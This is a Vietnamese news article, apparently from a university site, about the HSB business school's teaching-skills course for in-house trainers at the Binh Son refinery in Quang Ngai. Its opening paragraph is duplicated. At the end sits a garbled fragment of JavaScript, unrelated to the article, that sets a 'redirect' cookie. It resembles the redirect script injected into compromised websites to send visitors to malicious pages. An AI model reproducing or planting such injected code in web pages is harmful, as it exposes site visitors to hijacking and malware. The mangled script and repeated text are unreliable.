bsr quang ngaiNhận thấy nhu cầu đào tạo và xây dựng đội ngũ giảng viên từ chính nguồn nhân lực nội bộ trong các doanh nghiệp luôn là một vấn đề thiết thực và hết sức quan trọng, vừa qua, Khoa Quản trị Kinh doanh (HSB), Đại học Quốc gia Hà Nội đã triển khai thành công khóa đào tạo về “Kỹ năng giảng dạy” dành cho các giảng viên kiêm nhiệm tại Công ty TNHH MTV Lọc Hóa Dầu Bình Sơn, TP. Quảng Ngãi.

Nhận thấy nhu cầu đào tạo và xây dựng đội ngũ giảng viên từ chính nguồn nhân lực nội bộ trong các doanh nghiệp luôn là một vấn đề thiết thực và hết sức quan trọng, vừa qua, Khoa Quản trị Kinh doanh (HSB), Đại học Quốc gia Hà Nội đã triển khai thành công khóa đào tạo về “Kỹ năng giảng dạy” dành cho các giảng viên kiêm nhiệm tại Công ty TNHH MTV Lọc Hóa Dầu Bình Sơn, TP. Quảng Ngãi. Việc Khoa Quản trị Kinh doanh (HSB) đưa chương trình đào tạo cho các cán bộ nhân viên kiêm giảng viên nội bộ tới thành phố Quảng Ngãi đã cho thấy HSB luôn là đơn vị dẫn đầu trong việc tích cực vươn xa trên toàn quốc để mang tri thức tới những nhà lãnh đạo, cán bộ tài năng tại mọi doanh nghiệp.

Với phương pháp giảng dạy mang tính ứng dụng thực tế cao, kết hợp các hoạt động thảo luận nhóm và việc xây dựng sự tự tin vào bản thân cho các cán bộ kiêm giảng viên tại Công ty TNHH MTV Lọc Hóa Dầu Bình Sơn, kết thúc khóa học, các học viên của chương trình đã cảm thấy mạnh dạn hơn trong việc truyền đạt, chia sẻ ý tưởng cũng như kiến thức tới các thành viên khác trong công ty . Sự thành công từ chương trình đào tạo về “Kỹ năng giảng dạy” đã thực sự chứng minh cho phương châm, với HSB, việc đào tạo nguồn nhân lực luôn được ươm mầm từ những nhân tốc gốc sẵn có, và đó luôn là hướng đào tạo mà HSB đã và đang khuyến khích các doanh nghiệp tại Việt Nam hướng tới.

bsr quang ngai

bsr quang ngai 1

bsr quang ngai 2

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}